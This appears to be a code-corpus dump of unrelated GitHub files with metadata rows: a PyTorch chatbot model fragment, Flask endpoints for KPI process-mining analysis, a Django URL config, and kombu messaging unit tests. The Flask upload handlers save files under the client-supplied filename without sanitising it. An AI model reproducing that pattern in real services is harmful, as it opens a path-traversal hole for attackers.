        if self.use_attn:
            # Attention concatenates embeddings with hidden states, so the
            # two sizes must match; override the caller's hidden_size.
            self.hidden_size = embedding.emb_size
        else:
            self.hidden_size = hidden_size
        self.encoder = Encoder(self.embedding, self.hidden_size, rnn_cell=rnn_cell, bidirectional=bidirectional, n_layers=n_layers, dropout=dropout, device=device)
        self.decoder = Decoder(self.embedding, self.hidden_size, rnn_cell=rnn_cell, bidirectional=bidirectional, n_layers=n_layers, dropout=dropout, device=device, teaching_force_rate=teaching_force_rate, use_attn=self.use_attn, method=method, padded_len=padded_len)
    def forward(self, source, target):
        # print('> : ' + self.embedding.indice_to_sentence(source[0].tolist()))
        # print('= : ' + self.embedding.indice_to_sentence(target[0].tolist()))
        encoder_output, encoder_hidden = self.encoder(source)
        # Attention additionally needs the per-step encoder outputs.
        if self.use_attn:
            output = self.decoder(target, encoder_hidden, encoder_output)
        else:
            output = self.decoder(target, encoder_hidden)
        return output
| vincent861223/ChatBot | model/model.py | model.py | py | 7,730 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "torch.nn.Module",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "torch.nn.Embedding",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_n... |
2534597571 | import copy
import json
import os
import time
from flask import Blueprint, request, Response
import pm4py
from pm4py.algo.filtering.log.attributes import attributes_filter
from pm4py.objects.conversion.process_tree.converter import to_petri_net_transition_bordered as converter
from pm4py.visualization.common.utils import get_base64_from_gviz
from KPIAlgebras.entities import data
from KPIAlgebras.entities import model as model_object
from KPIAlgebras.request_objects import request_objects
from KPIAlgebras.response_objects import response_objects
from KPIAlgebras.serializers import extended_process_tree_serializer as serializer
from KPIAlgebras.use_cases import alignment_computation_use_case as alignment
from KPIAlgebras.use_cases import cycle_time_analysis_use_case as measurement_high_level
from KPIAlgebras.use_cases import decorate_extended_process_tree_use_case as decorate_tree
from KPIAlgebras.use_cases import import_event_log_use_case as import_log
from KPIAlgebras.use_cases import time_range_construction_use_case as measurement_fine_grained
from KPIAlgebras.util import constants, http_response_status_code
# Flask blueprint exposing the KPI analysis endpoints.
blueprint = Blueprint('endpoints', __name__)
# Module-level session state: /measurement populates these and the other
# routes reuse/mutate them.
# NOTE(review): one global session means concurrent clients overwrite each
# other's state -- confirm single-user deployment.
alignments = None
log = None
model = None
initial_marking = None
final_marking = None
extended_process_tree = None
@blueprint.route('/measurement', methods=['POST'])
def measurement():
    """Upload an event log + process-tree model, run the cycle-time analysis
    (plus fine-grained time ranges when the log has lifecycle start events),
    and return the decorated tree as JSON with an embedded SVG."""
    print("Begining the fine grained analysis")
    t1 = time.perf_counter()
    # NOTE(review): `parameters` is never used in this handler.
    parameters = dict()
    # Persist both uploads temporarily; they are deleted right after parsing.
    log_file = request.files['eventLog']
    log_file.save(os.path.join(constants.upload_folder, log_file.filename))
    model_file = request.files['model']
    model_file.save(os.path.join(constants.upload_folder, model_file.filename))
    import_log_use_case = import_log.ImportEventLogUseCase()
    request_object = request_objects.TimeRangeConstructionRequestObject.from_dict({'event_log': log_file.filename})
    global log
    log = data.EventLog(import_log_use_case.import_event_log_from_xes(request_object))
    os.remove(os.path.join(constants.upload_folder, log_file.filename))
    process_tree = pm4py.read_ptml(os.path.join(constants.upload_folder, model_file.filename))
    os.remove(os.path.join(constants.upload_folder, model_file.filename))
    global extended_process_tree
    extended_process_tree = model_object.ExtendedProcessTree(process_tree)
    # Convert the tree to a Petri net and align the log against it.
    global model, initial_marking, final_marking
    model, initial_marking, final_marking = converter.apply(extended_process_tree)
    alignment_use_case = alignment.AlignmentComputationUseCase()
    global alignments
    alignments = alignment_use_case.compute(model, initial_marking, final_marking, log)
    high_level_use_case = measurement_high_level.CycleTimeAnalysisUseCase()
    response = high_level_use_case.analyse(log.log, alignments, extended_process_tree, model)
    extended_process_tree = response.value
    # Fine-grained time ranges only make sense when events carry a
    # 'start' lifecycle transition (otherwise durations are unknown).
    lifecycle = attributes_filter.get_attribute_values(log.log, "lifecycle:transition")
    if lifecycle is not None and 'start' in lifecycle:
        # NOTE(review): this passes the EventLog wrapper `log`, while
        # /timeshifting passes `log.log` to the same constructor -- confirm
        # which one the use case expects.
        fine_grained_use_case = measurement_fine_grained.TimeRangesConstructionUseCase(log, extended_process_tree,
                                                                                      model, initial_marking,
                                                                                      final_marking, alignments)
        response = fine_grained_use_case.construct_time_ranges(log.log, alignments, model, initial_marking,
                                                               final_marking)
    decoration_use_case = decorate_tree.DecorateExtendedProcessTreeUseCase()
    gviz = decoration_use_case.decorate(extended_process_tree)
    svg = get_base64_from_gviz(gviz)
    # Serialize, inject the rendered SVG, and re-serialize for the response.
    extended_process_tree_json = json.dumps(response.value, cls=serializer.ExtendedProcessTreeJsonEncoder)
    json_dict = json.loads(extended_process_tree_json)
    json_dict["svg"] = svg.decode('utf-8')
    extended_process_tree_json = json.dumps(json_dict, cls=serializer.ExtendedProcessTreeJsonEncoder)
    t2 = time.perf_counter()
    print(t2 - t1)
    return Response(extended_process_tree_json, mimetype='application/json',
                    status=http_response_status_code.STATUS_CODES[response.type])
@blueprint.route('/timeshifting', methods=['POST'])
def timeshifting():
    """Shift time ranges of the current tree (state set up by /measurement)
    and return the re-decorated tree; the previous state is snapshotted so
    /undoChange can restore it."""
    # Merge JSON body and query-string parameters (query string wins).
    parameters = request.get_json()
    if parameters is None:
        parameters = dict()
    for arg, value in request.args.items():
        parameters[arg] = value
    request_object = request_objects.TimeShiftingRequestObject.from_dict(parameters)
    global log, model, initial_marking, final_marking, extended_process_tree, alignments
    # Snapshot the current tree for undo support.
    extended_process_tree.states.append(copy.deepcopy(extended_process_tree))
    fine_grained_use_case = measurement_fine_grained.TimeRangesConstructionUseCase(log.log, extended_process_tree,
                                                                                  model, initial_marking,
                                                                                  final_marking, alignments)
    response = fine_grained_use_case.shift_time_ranges(request_object)
    decoration_use_case = decorate_tree.DecorateExtendedProcessTreeUseCase()
    gviz = decoration_use_case.decorate(extended_process_tree)
    svg = get_base64_from_gviz(gviz)
    # Serialize, inject the rendered SVG, and re-serialize for the response.
    extended_process_tree_json = json.dumps(response.value, cls=serializer.ExtendedProcessTreeJsonEncoder)
    json_dict = json.loads(extended_process_tree_json)
    json_dict["svg"] = svg.decode('utf-8')
    extended_process_tree_json = json.dumps(json_dict, cls=serializer.ExtendedProcessTreeJsonEncoder)
    return Response(extended_process_tree_json, mimetype='application/json',
                    status=http_response_status_code.STATUS_CODES[response.type])
@blueprint.route('/undoChange', methods=['GET'])
def undo_change():
    """Restore the most recently snapshotted tree state and return it rendered."""
    global extended_process_tree
    # Pop the latest snapshot pushed by /timeshifting.
    extended_process_tree = extended_process_tree.states.pop()
    decoration_use_case = decorate_tree.DecorateExtendedProcessTreeUseCase()
    gviz = decoration_use_case.decorate(extended_process_tree)
    svg = get_base64_from_gviz(gviz)
    extended_process_tree_json = json.dumps(extended_process_tree, cls=serializer.ExtendedProcessTreeJsonEncoder)
    json_dict = json.loads(extended_process_tree_json)
    json_dict["svg"] = svg.decode('utf-8')
    extended_process_tree_json = json.dumps(json_dict, cls=serializer.ExtendedProcessTreeJsonEncoder)
    return Response(extended_process_tree_json, mimetype='application/json',
                    status=http_response_status_code.STATUS_CODES[response_objects.ResponseSuccess.SUCCESS])
@blueprint.route('/undoAllChanges', methods=['GET'])
def undo_all_changes():
    """Reset the tree to its very first snapshot and return it rendered."""
    global extended_process_tree
    # The first snapshot is the original (pre-shift) state.
    extended_process_tree = extended_process_tree.states[0]
    decoration_use_case = decorate_tree.DecorateExtendedProcessTreeUseCase()
    gviz = decoration_use_case.decorate(extended_process_tree)
    svg = get_base64_from_gviz(gviz)
    extended_process_tree_json = json.dumps(extended_process_tree, cls=serializer.ExtendedProcessTreeJsonEncoder)
    json_dict = json.loads(extended_process_tree_json)
    json_dict["svg"] = svg.decode('utf-8')
    extended_process_tree_json = json.dumps(json_dict, cls=serializer.ExtendedProcessTreeJsonEncoder)
    return Response(extended_process_tree_json, mimetype='application/json',
                    status=http_response_status_code.STATUS_CODES[response_objects.ResponseSuccess.SUCCESS])
| luisfsts/KPIAlgebras | KPIAlgebras/rest/endpoints.py | endpoints.py | py | 7,463 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "flask.Blueprint",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "time.perf_counter",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "flask.request.files",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "flask.requ... |
18699671015 | from django.urls import path
from posting.views import (
PostingView,
CategoryView,
PostingLikeView,
PostingScrapView
)
# Routes mounted under the posting app's URL prefix.
urlpatterns = [
    path('', PostingView.as_view()),            # list/create postings
    path('/category', CategoryView.as_view()),  # posting categories
    path('/like', PostingLikeView.as_view()),   # like/unlike a posting
    path('/scrap', PostingScrapView.as_view())  # scrap (bookmark) a posting
]
| wecode-bootcamp-korea/17-1st-SweetHome-backend | posting/urls.py | urls.py | py | 336 | python | en | code | 3 | github-code | 6 | [
{
"api_name": "django.urls.path",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "posting.views.PostingView.as_view",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "posting.views.PostingView",
"line_number": 11,
"usage_type": "name"
},
{
"api_... |
8267902176 | from __future__ import annotations
import pickle
import sys
from collections import defaultdict
from unittest.mock import Mock, patch
import pytest
from kombu import Connection, Consumer, Exchange, Producer, Queue
from kombu.exceptions import MessageStateError
from kombu.utils import json
from kombu.utils.functional import ChannelPromise
from t.mocks import Transport
class test_Producer:
    """Unit tests for kombu.Producer: serialization, declaration,
    publish options, channel revival and context-manager behaviour.
    Uses the in-memory mock Transport, so no broker is required."""
    def setup(self):
        # Fresh unbound exchange + connected mock-transport connection per test.
        self.exchange = Exchange('foo', 'direct')
        self.connection = Connection(transport=Transport)
        self.connection.connect()
        assert self.connection.connection.connected
        assert not self.exchange.is_bound
    def test_repr(self):
        p = Producer(self.connection)
        assert repr(p)
    def test_pickle(self):
        # Producers must survive a pickle round-trip (serializer preserved).
        chan = Mock()
        producer = Producer(chan, serializer='pickle')
        p2 = pickle.loads(pickle.dumps(producer))
        assert p2.serializer == producer.serializer
    def test_no_channel(self):
        p = Producer(None)
        assert not p._channel
    @patch('kombu.messaging.maybe_declare')
    def test_maybe_declare(self, maybe_declare):
        p = self.connection.Producer()
        q = Queue('foo')
        p.maybe_declare(q)
        maybe_declare.assert_called_with(q, p.channel, False)
    @patch('kombu.common.maybe_declare')
    def test_maybe_declare_when_entity_false(self, maybe_declare):
        # A falsy entity must not be forwarded to maybe_declare.
        p = self.connection.Producer()
        p.maybe_declare(None)
        maybe_declare.assert_not_called()
    def test_auto_declare(self):
        channel = self.connection.channel()
        p = Producer(channel, self.exchange, auto_declare=True)
        # creates Exchange clone at bind
        assert p.exchange is not self.exchange
        assert p.exchange.is_bound
        # auto_declare declares the exchange lazily, on first publish
        assert 'exchange_declare' not in channel
        p.publish('foo')
        assert 'exchange_declare' in channel
    def test_manual_declare(self):
        channel = self.connection.channel()
        p = Producer(channel, self.exchange, auto_declare=False)
        assert p.exchange.is_bound
        # auto_declare=False does not declare exchange
        assert 'exchange_declare' not in channel
        # p.declare() declares the exchange explicitly
        p.declare()
        assert 'exchange_declare' in channel
    def test_prepare(self):
        # _prepare serializes dicts to JSON with utf-8 encoding.
        message = {'the quick brown fox': 'jumps over the lazy dog'}
        channel = self.connection.channel()
        p = Producer(channel, self.exchange, serializer='json')
        m, ctype, cencoding = p._prepare(message, headers={})
        assert json.loads(m) == message
        assert ctype == 'application/json'
        assert cencoding == 'utf-8'
    def test_prepare_compression(self):
        # Compression keeps the content type but records the compression
        # scheme in the headers; payload must decompress back to the input.
        message = {'the quick brown fox': 'jumps over the lazy dog'}
        channel = self.connection.channel()
        p = Producer(channel, self.exchange, serializer='json')
        headers = {}
        m, ctype, cencoding = p._prepare(message, compression='zlib',
                                         headers=headers)
        assert ctype == 'application/json'
        assert cencoding == 'utf-8'
        assert headers['compression'] == 'application/x-gzip'
        import zlib
        assert json.loads(zlib.decompress(m).decode('utf-8')) == message
    def test_prepare_custom_content_type(self):
        # Explicit content_type bypasses serialization; bytes default to
        # 'binary' encoding unless one is given.
        message = b'the quick brown fox'
        channel = self.connection.channel()
        p = Producer(channel, self.exchange, serializer='json')
        m, ctype, cencoding = p._prepare(message, content_type='custom')
        assert m == message
        assert ctype == 'custom'
        assert cencoding == 'binary'
        m, ctype, cencoding = p._prepare(message, content_type='custom',
                                         content_encoding='alien')
        assert m == message
        assert ctype == 'custom'
        assert cencoding == 'alien'
    def test_prepare_is_already_unicode(self):
        # text/plain str payloads are encoded to utf-8 bytes exactly once.
        message = 'the quick brown fox'
        channel = self.connection.channel()
        p = Producer(channel, self.exchange, serializer='json')
        m, ctype, cencoding = p._prepare(message, content_type='text/plain')
        assert m == message.encode('utf-8')
        assert ctype == 'text/plain'
        assert cencoding == 'utf-8'
        m, ctype, cencoding = p._prepare(message, content_type='text/plain',
                                         content_encoding='utf-8')
        assert m == message.encode('utf-8')
        assert ctype == 'text/plain'
        assert cencoding == 'utf-8'
    def test_publish_with_Exchange_instance(self):
        # An Exchange object passed to publish() is reduced to its name.
        p = self.connection.Producer()
        p.channel = Mock()
        p.channel.connection.client.declared_entities = set()
        p.publish('hello', exchange=Exchange('foo'), delivery_mode='transient')
        assert p._channel.basic_publish.call_args[1]['exchange'] == 'foo'
    def test_publish_with_expiration(self):
        # expiration is given in seconds and forwarded in milliseconds.
        p = self.connection.Producer()
        p.channel = Mock()
        p.channel.connection.client.declared_entities = set()
        p.publish('hello', exchange=Exchange('foo'), expiration=10)
        properties = p._channel.prepare_message.call_args[0][5]
        assert properties['expiration'] == '10000'
    def test_publish_with_timeout(self):
        # timeout is passed through unchanged to basic_publish.
        p = self.connection.Producer()
        p.channel = Mock()
        p.channel.connection.client.declared_entities = set()
        p.publish('test_timeout', exchange=Exchange('foo'), timeout=1)
        timeout = p._channel.basic_publish.call_args[1]['timeout']
        assert timeout == 1
    def test_publish_with_reply_to(self):
        # A Queue given as reply_to is reduced to its name.
        p = self.connection.Producer()
        p.channel = Mock()
        p.channel.connection.client.declared_entities = set()
        assert not p.exchange.name
        p.publish('hello', exchange=Exchange('foo'), reply_to=Queue('foo'))
        properties = p._channel.prepare_message.call_args[0][5]
        assert properties['reply_to'] == 'foo'
    def test_set_on_return(self):
        # Accessing .channel resolves the ChannelPromise and registers the
        # on_return callback for basic_return events.
        chan = Mock()
        chan.events = defaultdict(Mock)
        p = Producer(ChannelPromise(lambda: chan), on_return='on_return')
        p.channel
        chan.events['basic_return'].add.assert_called_with('on_return')
    def test_publish_retry_calls_ensure(self):
        # retry=True must route the publish through connection.ensure().
        p = Producer(Mock())
        p._connection = Mock()
        p._connection.declared_entities = set()
        ensure = p.connection.ensure = Mock()
        p.publish('foo', exchange='foo', retry=True)
        ensure.assert_called()
    def test_publish_retry_with_declare(self):
        # Entities in declare=[...] are declared before publishing.
        p = self.connection.Producer()
        p.maybe_declare = Mock()
        p.connection.ensure = Mock()
        ex = Exchange('foo')
        p._publish('hello', 0, '', '', {}, {}, 'rk', 0, 0, ex, declare=[ex])
        p.maybe_declare.assert_called_with(ex)
    def test_revive_when_channel_is_connection(self):
        # Reviving with a Connection adopts its default channel.
        p = self.connection.Producer()
        p.exchange = Mock()
        new_conn = Connection('memory://')
        defchan = new_conn.default_channel
        p.revive(new_conn)
        assert p.channel is defchan
        p.exchange.revive.assert_called_with(defchan)
    def test_enter_exit(self):
        # Context manager returns self and releases on exit.
        p = self.connection.Producer()
        p.release = Mock()
        with p as x:
            assert x is p
        p.release.assert_called_with()
    def test_connection_property_handles_AttributeError(self):
        # A channel without a connection attribute yields connection=None
        # instead of raising.
        p = self.connection.Producer()
        p.channel = object()
        p.__connection__ = None
        assert p.connection is None
    def test_publish(self):
        # Full publish round-trip against the mock channel: payload,
        # content type/encoding, priority, delivery mode and routing key.
        channel = self.connection.channel()
        p = Producer(channel, self.exchange, serializer='json')
        message = {'the quick brown fox': 'jumps over the lazy dog'}
        ret = p.publish(message, routing_key='process')
        assert 'prepare_message' in channel
        assert 'basic_publish' in channel
        m, exc, rkey = ret
        assert json.loads(m['body']) == message
        assert m['content_type'] == 'application/json'
        assert m['content_encoding'] == 'utf-8'
        assert m['priority'] == 0
        assert m['properties']['delivery_mode'] == 2
        assert exc == p.exchange.name
        assert rkey == 'process'
    def test_no_exchange(self):
        # Without an exchange argument the producer binds an unnamed exchange.
        chan = self.connection.channel()
        p = Producer(chan)
        assert not p.exchange.name
    def test_revive(self):
        # revive() rebinds both the producer and its exchange to the channel.
        chan = self.connection.channel()
        p = Producer(chan)
        chan2 = self.connection.channel()
        p.revive(chan2)
        assert p.channel is chan2
        assert p.exchange.channel is chan2
    def test_on_return(self):
        # An on_return callable is registered for basic_return events.
        chan = self.connection.channel()
        def on_return(exception, exchange, routing_key, message):
            pass
        p = Producer(chan, on_return=on_return)
        assert on_return in chan.events['basic_return']
        assert p.on_return
class test_Consumer:
    """Unit tests for kombu's Consumer.

    ``setup`` gives every test a connected mock-transport Connection and a
    direct exchange; individual tests exercise queue declaration, delivery
    callbacks, ack/reject/requeue semantics, QoS, purging and channel
    revival.  The mock channel records which AMQP methods were called, so
    ``'method_name' in channel`` asserts that a method was invoked.
    """
    def setup(self):
        """Create a fresh mock-transport connection and a direct exchange."""
        self.connection = Connection(transport=Transport)
        self.connection.connect()
        assert self.connection.connection.connected
        self.exchange = Exchange('foo', 'direct')
    def test_accept(self):
        """accept= serializer aliases expand to MIME content types."""
        a = Consumer(self.connection)
        assert a.accept is None
        b = Consumer(self.connection, accept=['json', 'pickle'])
        assert b.accept == {
            'application/json', 'application/x-python-serialize',
        }
        c = Consumer(self.connection, accept=b.accept)
        assert b.accept == c.accept
    def test_enter_exit_cancel_raises(self):
        """Errors raised by cancel() during __exit__ are swallowed."""
        c = Consumer(self.connection)
        c.cancel = Mock(name='Consumer.cancel')
        c.cancel.side_effect = KeyError('foo')
        with c:
            pass
        c.cancel.assert_called_with()
    def test_enter_exit_cancel_not_called_on_connection_error(self):
        """__exit__ skips cancel() when leaving due to a connection error."""
        c = Consumer(self.connection)
        c.cancel = Mock(name='Consumer.cancel')
        assert self.connection.connection_errors
        with pytest.raises(self.connection.connection_errors[0]):
            with c:
                raise self.connection.connection_errors[0]()
        c.cancel.assert_not_called()
    def test_receive_callback_accept(self):
        """on_message callbacks receive the raw message, tagged with accept."""
        message = Mock(name='Message')
        message.errors = []
        callback = Mock(name='on_message')
        c = Consumer(self.connection, accept=['json'], on_message=callback)
        c.on_decode_error = None
        c.channel = Mock(name='channel')
        c.channel.message_to_python = None
        c._receive_callback(message)
        callback.assert_called_with(message)
        assert message.accept == c.accept
    def test_accept__content_disallowed(self):
        """Delivering an unaccepted content type raises ContentDisallowed."""
        conn = Connection('memory://')
        q = Queue('foo', exchange=self.exchange)
        p = conn.Producer()
        p.publish(
            {'complex': object()},
            declare=[q], exchange=self.exchange, serializer='pickle',
        )
        callback = Mock(name='callback')
        with conn.Consumer(queues=[q], callbacks=[callback]) as consumer:
            with pytest.raises(consumer.ContentDisallowed):
                conn.drain_events(timeout=1)
        callback.assert_not_called()
    def test_accept__content_allowed(self):
        """A pickled message is decoded when pickle is in accept=."""
        conn = Connection('memory://')
        q = Queue('foo', exchange=self.exchange)
        p = conn.Producer()
        p.publish(
            {'complex': object()},
            declare=[q], exchange=self.exchange, serializer='pickle',
        )
        callback = Mock(name='callback')
        with conn.Consumer(queues=[q], accept=['pickle'],
                           callbacks=[callback]):
            conn.drain_events(timeout=1)
        callback.assert_called()
        body, message = callback.call_args[0]
        assert body['complex']
    def test_set_no_channel(self):
        """A consumer may start channel-less and be revived later."""
        c = Consumer(None)
        assert c.channel is None
        c.revive(Mock())
        assert c.channel
    def test_set_no_ack(self):
        """no_ack=True is stored on the consumer."""
        channel = self.connection.channel()
        queue = Queue('qname', self.exchange, 'rkey')
        consumer = Consumer(channel, queue, auto_declare=True, no_ack=True)
        assert consumer.no_ack
    def test_add_queue_when_auto_declare(self):
        """add_queue() declares the queue when auto_declare is on."""
        consumer = self.connection.Consumer(auto_declare=True)
        q = Mock()
        q.return_value = q
        consumer.add_queue(q)
        assert q in consumer.queues
        q.declare.assert_called_with()
    def test_add_queue_when_not_auto_declare(self):
        """add_queue() defers declaration when auto_declare is off."""
        consumer = self.connection.Consumer(auto_declare=False)
        q = Mock()
        q.return_value = q
        consumer.add_queue(q)
        assert q in consumer.queues
        assert not q.declare.call_count
    def test_consume_without_queues_returns(self):
        """consume() is a no-op when the consumer has no queues."""
        consumer = self.connection.Consumer()
        consumer.queues[:] = []
        assert consumer.consume() is None
    def test_consuming_from(self):
        """consuming_from() matches active tags by queue or queue name."""
        consumer = self.connection.Consumer()
        consumer.queues[:] = [Queue('a'), Queue('b'), Queue('d')]
        # Only 'a' and 'b' have active consumer tags; 'd' is bound but idle.
        consumer._active_tags = {'a': 1, 'b': 2}
        assert not consumer.consuming_from(Queue('c'))
        assert not consumer.consuming_from('c')
        assert not consumer.consuming_from(Queue('d'))
        assert not consumer.consuming_from('d')
        assert consumer.consuming_from(Queue('a'))
        assert consumer.consuming_from(Queue('b'))
        assert consumer.consuming_from('b')
    def test_receive_callback_without_m2p(self):
        """Without message_to_python the decoded body is passed to receive."""
        channel = self.connection.channel()
        c = channel.Consumer()
        m2p = getattr(channel, 'message_to_python')
        channel.message_to_python = None
        try:
            message = Mock()
            message.errors = []
            message.decode.return_value = 'Hello'
            recv = c.receive = Mock()
            c._receive_callback(message)
            recv.assert_called_with('Hello', message)
        finally:
            # Restore the channel attribute so later tests are unaffected.
            channel.message_to_python = m2p
    def test_receive_callback__message_errors(self):
        """Messages carrying decode errors re-raise them in the callback."""
        channel = self.connection.channel()
        channel.message_to_python = None
        c = channel.Consumer()
        message = Mock()
        try:
            raise KeyError('foo')
        except KeyError:
            # Attach a real captured traceback, as the transport would.
            message.errors = [sys.exc_info()]
        message._reraise_error.side_effect = KeyError()
        with pytest.raises(KeyError):
            c._receive_callback(message)
    def test_set_callbacks(self):
        """callbacks= passed at construction are stored verbatim."""
        channel = self.connection.channel()
        queue = Queue('qname', self.exchange, 'rkey')
        callbacks = [lambda x, y: x,
                     lambda x, y: x]
        consumer = Consumer(channel, queue, auto_declare=True,
                            callbacks=callbacks)
        assert consumer.callbacks == callbacks
    def test_auto_declare(self):
        """auto_declare binds copies of queues and declares exactly once."""
        channel = self.connection.channel()
        queue = Queue('qname', self.exchange, 'rkey')
        consumer = Consumer(channel, queue, auto_declare=True)
        consumer.consume()
        consumer.consume()  # twice is a noop
        # The consumer binds a *copy* of the queue/exchange, never the
        # originals, so the user's objects stay unbound.
        assert consumer.queues[0] is not queue
        assert consumer.queues[0].is_bound
        assert consumer.queues[0].exchange.is_bound
        assert consumer.queues[0].exchange is not self.exchange
        for meth in ('exchange_declare',
                     'queue_declare',
                     'queue_bind',
                     'basic_consume'):
            assert meth in channel
        assert channel.called.count('basic_consume') == 1
        assert consumer._active_tags
        consumer.cancel_by_queue(queue.name)
        consumer.cancel_by_queue(queue.name)
        assert not consumer._active_tags
    def test_consumer_tag_prefix(self):
        """tag_prefix= is prepended to generated consumer tags."""
        channel = self.connection.channel()
        queue = Queue('qname', self.exchange, 'rkey')
        consumer = Consumer(channel, queue, tag_prefix='consumer_')
        consumer.consume()
        assert consumer._active_tags[queue.name].startswith('consumer_')
    def test_manual_declare(self):
        """With auto_declare off, nothing is declared until declare()."""
        channel = self.connection.channel()
        queue = Queue('qname', self.exchange, 'rkey')
        consumer = Consumer(channel, queue, auto_declare=False)
        assert consumer.queues[0] is not queue
        assert consumer.queues[0].is_bound
        assert consumer.queues[0].exchange.is_bound
        assert consumer.queues[0].exchange is not self.exchange
        for meth in ('exchange_declare',
                     'queue_declare',
                     'basic_consume'):
            assert meth not in channel
        consumer.declare()
        for meth in ('exchange_declare',
                     'queue_declare',
                     'queue_bind'):
            assert meth in channel
        # declare() never starts consuming; that requires consume().
        assert 'basic_consume' not in channel
        consumer.consume()
        assert 'basic_consume' in channel
    def test_consume__cancel(self):
        """cancel() sends basic_cancel and clears the active tags."""
        channel = self.connection.channel()
        queue = Queue('qname', self.exchange, 'rkey')
        consumer = Consumer(channel, queue, auto_declare=True)
        consumer.consume()
        consumer.cancel()
        assert 'basic_cancel' in channel
        assert not consumer._active_tags
    def test___enter____exit__(self):
        """The context manager consumes on enter and cancels on exit."""
        channel = self.connection.channel()
        queue = Queue('qname', self.exchange, 'rkey')
        consumer = Consumer(channel, queue, auto_declare=True)
        context = consumer.__enter__()
        assert context is consumer
        assert consumer._active_tags
        res = consumer.__exit__(None, None, None)
        assert not res
        assert 'basic_cancel' in channel
        assert not consumer._active_tags
    def test_flow(self):
        """flow() forwards to the channel's flow method."""
        channel = self.connection.channel()
        queue = Queue('qname', self.exchange, 'rkey')
        consumer = Consumer(channel, queue, auto_declare=True)
        consumer.flow(False)
        assert 'flow' in channel
    def test_qos(self):
        """qos() forwards to basic_qos."""
        channel = self.connection.channel()
        queue = Queue('qname', self.exchange, 'rkey')
        consumer = Consumer(channel, queue, auto_declare=True)
        consumer.qos(30, 10, False)
        assert 'basic_qos' in channel
    def test_purge(self):
        """purge() empties every queue the consumer is bound to."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        b2 = Queue('qname2', self.exchange, 'rkey')
        b3 = Queue('qname3', self.exchange, 'rkey')
        b4 = Queue('qname4', self.exchange, 'rkey')
        consumer = Consumer(channel, [b1, b2, b3, b4], auto_declare=True)
        consumer.purge()
        assert channel.called.count('queue_purge') == 4
    def test_multiple_queues(self):
        """Each queue gets its own declare/bind/consume/cancel calls."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        b2 = Queue('qname2', self.exchange, 'rkey')
        b3 = Queue('qname3', self.exchange, 'rkey')
        b4 = Queue('qname4', self.exchange, 'rkey')
        consumer = Consumer(channel, [b1, b2, b3, b4])
        consumer.consume()
        assert channel.called.count('exchange_declare') == 4
        assert channel.called.count('queue_declare') == 4
        assert channel.called.count('queue_bind') == 4
        assert channel.called.count('basic_consume') == 4
        assert len(consumer._active_tags) == 4
        consumer.cancel()
        assert channel.called.count('basic_cancel') == 4
        assert not len(consumer._active_tags)
    def test_receive_callback(self):
        """Registered callbacks get the decoded body and can ack."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        consumer = Consumer(channel, [b1])
        received = []
        def callback(message_data, message):
            received.append(message_data)
            message.ack()
            message.payload # trigger cache
        consumer.register_callback(callback)
        consumer._receive_callback({'foo': 'bar'})
        assert 'basic_ack' in channel
        assert 'message_to_python' in channel
        assert received[0] == {'foo': 'bar'}
    def test_basic_ack_twice(self):
        """Acking a message twice raises MessageStateError."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        consumer = Consumer(channel, [b1])
        def callback(message_data, message):
            message.ack()
            message.ack()
        consumer.register_callback(callback)
        with pytest.raises(MessageStateError):
            consumer._receive_callback({'foo': 'bar'})
    def test_basic_reject(self):
        """reject() issues basic_reject on the channel."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        consumer = Consumer(channel, [b1])
        def callback(message_data, message):
            message.reject()
        consumer.register_callback(callback)
        consumer._receive_callback({'foo': 'bar'})
        assert 'basic_reject' in channel
    def test_basic_reject_twice(self):
        """Rejecting a message twice raises MessageStateError."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        consumer = Consumer(channel, [b1])
        def callback(message_data, message):
            message.reject()
            message.reject()
        consumer.register_callback(callback)
        with pytest.raises(MessageStateError):
            consumer._receive_callback({'foo': 'bar'})
        assert 'basic_reject' in channel
    def test_basic_reject__requeue(self):
        """requeue() issues basic_reject with the requeue flag."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        consumer = Consumer(channel, [b1])
        def callback(message_data, message):
            message.requeue()
        consumer.register_callback(callback)
        consumer._receive_callback({'foo': 'bar'})
        assert 'basic_reject:requeue' in channel
    def test_basic_reject__requeue_twice(self):
        """Requeueing a message twice raises MessageStateError."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        consumer = Consumer(channel, [b1])
        def callback(message_data, message):
            message.requeue()
            message.requeue()
        consumer.register_callback(callback)
        with pytest.raises(MessageStateError):
            consumer._receive_callback({'foo': 'bar'})
        assert 'basic_reject:requeue' in channel
    def test_receive_without_callbacks_raises(self):
        """receive() with no registered callbacks is an error."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        consumer = Consumer(channel, [b1])
        with pytest.raises(NotImplementedError):
            consumer.receive(1, 2)
    def test_decode_error(self):
        """Decode errors propagate when no on_decode_error is set."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        consumer = Consumer(channel, [b1])
        consumer.channel.throw_decode_error = True
        with pytest.raises(ValueError):
            consumer._receive_callback({'foo': 'bar'})
    def test_on_decode_error_callback(self):
        """on_decode_error= receives the raw message and the exception."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        thrown = []
        def on_decode_error(msg, exc):
            thrown.append((msg.body, exc))
        consumer = Consumer(channel, [b1], on_decode_error=on_decode_error)
        consumer.channel.throw_decode_error = True
        consumer._receive_callback({'foo': 'bar'})
        assert thrown
        m, exc = thrown[0]
        assert json.loads(m) == {'foo': 'bar'}
        assert isinstance(exc, ValueError)
    def test_recover(self):
